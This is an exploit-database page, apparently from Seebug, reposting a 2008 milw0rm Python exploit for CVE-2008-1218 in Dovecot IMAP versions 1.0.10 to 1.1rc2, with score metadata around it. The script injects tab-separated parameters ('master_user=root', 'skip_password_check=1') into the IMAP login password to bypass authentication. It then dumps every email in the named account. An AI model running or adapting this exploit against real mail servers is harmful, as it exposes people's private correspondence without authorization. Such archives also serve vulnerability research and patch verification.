Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit

2014-07-0100:00:00

Root

www.seebug.org

0.075 Low

EPSS

Percentile

93.4%

JSON

No description provided by source.


                                                #lame Dovecot IMAP [1.0.10 -&#62; 1.1rc3] Exploit
#Here&#39;s an exploit for the recent TAB vulnerability in Dovecot.
#It&#39;s nothing special since in the wild there are few to none
#targets because of the special option which has to be set.
#see CVE Entry CVE-2008-1218
#Exploit written by Kingcope
import sys
import imaplib

print &#34;Dovecot IMAP [1.0.10 -&#62; 1.1rc2] Exploit&#34;
print &#34;Prints out all E-Mails for any account if special configuration option is set&#34;
print &#34;Exploit written by kingcope\n&#34;

if len(sys.argv)&#60;3:
     print &#34;usage: %s &#60;hostname/ip address&#62; &#60;account&#62; [-nossl]&#34; % sys.argv[0]
     exit(0);

if len(sys.argv)&#62;3 and sys.argv[3] == &#34;-nossl&#34;:
	M = imaplib.IMAP4(sys.argv[1])
else:
	M = imaplib.IMAP4_SSL(sys.argv[1])
M.login(sys.argv[2], &#34;\&#34;\tmaster_user=root\tskip_password_check=1\&#34;&#34;);
M.select()
print &#34;login succeeded.&#34;
typ, data = M.search(None, &#39;ALL&#39;)
k=0
for num in data[0].split():
    typ, data = M.fetch(num, &#39;(RFC822)&#39;)
    print &#39;Message %s\n%s\n&#39; % (num, data[0][1])
    k=k+1
M.close()
M.logout()
print &#34;Messages read: %s&#34; % k

# milw0rm.com [2008-03-14]

0.075 Low

EPSS

Percentile

93.4%

JSON

Related for SSV:65261